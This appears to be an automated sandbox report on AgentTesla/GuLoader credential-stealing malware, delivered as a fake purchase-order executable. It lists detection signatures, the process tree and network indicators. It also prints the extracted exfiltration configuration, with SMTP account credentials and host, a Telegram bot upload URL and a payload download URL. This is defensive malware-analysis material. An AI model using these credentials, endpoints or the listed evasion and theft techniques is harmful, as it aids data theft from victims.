Loading ...

Play interactive tourEdit tour

Analysis Report PO_010-240.exe

Overview

General Information

Sample Name:PO_010-240.exe
Analysis ID:322367
MD5:9c827b2d04fd53e767ee0d2413d99185
SHA1:5ab0d449f17e2aefa298a16d938dfa5c97a756a9
SHA256:d30cc9d8ea941300167901e21d771b2df8164a5dad45e120b9e716dd6e9744e5

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • PO_010-240.exe (PID: 3420 cmdline: 'C:\Users\user\Desktop\PO_010-240.exe' MD5: 9C827B2D04FD53E767EE0D2413D99185)
    • RegAsm.exe (PID: 6072 cmdline: 'C:\Users\user\Desktop\PO_010-240.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • PREIMBUED.exe (PID: 4272 cmdline: 'C:\Users\user\sore\PREIMBUED.exe' MD5: 9C827B2D04FD53E767EE0D2413D99185)
    • RegAsm.exe (PID: 6264 cmdline: 'C:\Users\user\sore\PREIMBUED.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • PREIMBUED.exe (PID: 6336 cmdline: 'C:\Users\user\sore\PREIMBUED.exe' MD5: 9C827B2D04FD53E767EE0D2413D99185)
    • RegAsm.exe (PID: 6432 cmdline: 'C:\Users\user\sore\PREIMBUED.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "Igjkc0HpN", "URL: ": "http://ve2IyZTobSOfG5Vf.com", "To: ": "officesales@jtceh.com", "ByHost: ": "mail.jtceh.com:587", "Password: ": "=0AmHJaHF", "From: ": "officesales@jtceh.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.213.255.53, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 6072, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49738

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.6264.8.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "Igjkc0HpN", "URL: ": "http://ve2IyZTobSOfG5Vf.com", "To: ": "officesales@jtceh.com", "ByHost: ": "mail.jtceh.com:587", "Password: ": "=0AmHJaHF", "From: ": "officesales@jtceh.com"}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\sore\PREIMBUED.exeReversingLabs: Detection: 41%
            Multi AV Scanner detection for submitted fileShow sources
            Source: PO_010-240.exeVirustotal: Detection: 20%Perma Link
            Source: PO_010-240.exeReversingLabs: Detection: 41%

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49738 -> 162.213.255.53:587
            May check the online IP address of the machineShow sources
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: global trafficTCP traffic: 192.168.2.3:49738 -> 162.213.255.53:587
            Source: Joe Sandbox ViewIP Address: 184.73.247.141 184.73.247.141
            Source: Joe Sandbox ViewIP Address: 184.73.247.141 184.73.247.141
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficTCP traffic: 192.168.2.3:49738 -> 162.213.255.53:587
            Source: unknownDNS traffic detected: queries for: jtceh.com
            Source: RegAsm.exe, 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: http://DuWwST.com
            Source: RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000008.00000002.1278287252.0000000001346000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 00000008.00000003.488927857.0000000000EC1000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 00000008.00000003.488927857.0000000000EC1000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
            Source: RegAsm.exe, 00000008.00000003.518140961.000000000135A000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: RegAsm.exe, 00000008.00000002.1283623530.000000001DEDC000.00000004.00000001.sdmpString found in binary or memory: http://mail.jtceh.com
            Source: RegAsm.exe, 00000008.00000002.1278287252.0000000001346000.00000004.00000020.sdmp, RegAsm.exe, 00000008.00000003.488927857.0000000000EC1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 00000008.00000003.518140961.000000000135A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0#
            Source: RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RegAsm.exe, 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmpString found in binary or memory: http://ve2IyZTobSOfG5Vf.com
            Source: RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
            Source: RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
            Source: RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
            Source: RegAsm.exe, 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
            Source: RegAsm.exeString found in binary or memory: https://jtceh.com/oficework_AJmKD179.bin
            Source: RegAsm.exe, 00000008.00000003.518140961.000000000135A000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 00000008.00000003.488927857.0000000000EC1000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: RegAsm.exe, 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Installs a global keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary:

            barindex
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: PO_010-240.exe
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B653C NtResumeThread,
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_029B269D NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00965D45 NtProtectVirtualMemory,
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 6_2_02BE269D NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F8622C LoadLibraryA,NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F85D45 NtProtectVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F862E3 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F862BC NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F862B1 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F864A3 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86472 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F8626F NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86449 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86245 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86420 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F863FB NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F863D4 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F863AD NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86383 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86565 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F8634F NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F8653C NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86328 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F86306 NtQueryInformationProcess,
            Source: C:\Users\user\sore\PREIMBUED.exeCode function: 9_2_02152722 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405847
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405C4D
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405C59
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040585C
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405C62
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405471
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405403
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405C0B
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040580D
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405C21
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040582E
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405433
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405CC2
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004054D0
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004054E5
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405CE9
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004058F4
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004054FB
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004058FF
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405C82
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405899
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405CB4
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405940
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040554C
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405D4F
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405961
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405975
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040551B
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040591D
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405D2B
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00408DC6
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405DE4
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004059EC
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405987
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040559D
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004059A5
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004059B8
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405656
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405E79
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405A7D
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405A02
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405E05
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405A1A
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405630
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405E38
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004056D3
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405AD8
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405EDD
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405AE9
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405A88
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405E8A
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040568B
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405A94
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405AA4
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004056A6
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405EAA
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004056B6
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405753
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405B57
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405765
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040576E
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405B7E
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405710
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040572A
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040533E
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004057C4
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405BC9
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004057D6
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405BDD
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004057F4
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_00405BF9
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_0040538C
            Source: C:\Users\user\Desktop\PO_010-240.exeCode function: 0_2_004057A1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00962AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1F6046A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1F60D310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1F604630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1F604690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F82AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1D9B46A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1D9BD300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1D9B4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1D9B4672
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20C13258
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20C1D548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20C197E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DD64B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DD5758
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DDF740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DDB148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DFCC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DF6088
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DF122F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DFAB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DF71B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_20DFC2D0
            Source: PO_010-240.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: PO_010-240.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: PREIMBUED.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: PREIMBUED.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: PO_010-240.exe, 00000000.00000002.239094748.0000000002980000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PO_010-240.exe
            Source: PO_010-240.exe, 00000000.00000000.193908141.0000000000411000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFrai.exe vs PO_010-240.exe
            Source: PO_010-240.exeBinary or memory string: OriginalFilenameFrai.exe vs PO_010-240.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/2@5/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\soreJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6372:120:WilError_01
            Source: C:\Users\user\Desktop\PO_010-240.exeFile created: C:\Users\user\AppData\Local\Temp\~DF6936BBC87031E172.TMPJump to behavior
            Source: PO_010-240.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO_010-240.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\sore\PREIMBUED.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\sore\PREIMBUED.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\PO_010-240.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: PO_010-240.exeVirustotal: Detection: 20%
            Source: PO_010-240.exeReversingLabs: Detection: 41%
            Source: unknownProcess created: C:\Users\user\Desktop\PO_010-240.exe 'C:\Users\user\Desktop\PO_010-240.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO_010-240.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\sore\PREIMBUED.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: unknownProcess created: C:\Users\user\sore\PREIMBUED.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO_010-240.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PO_010-240.exe'
            Source: C:\Users\user\sore\PREIMBUED.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: C:\Users\user\sore\PREIMBUED.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\sore\PREIMBUED.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
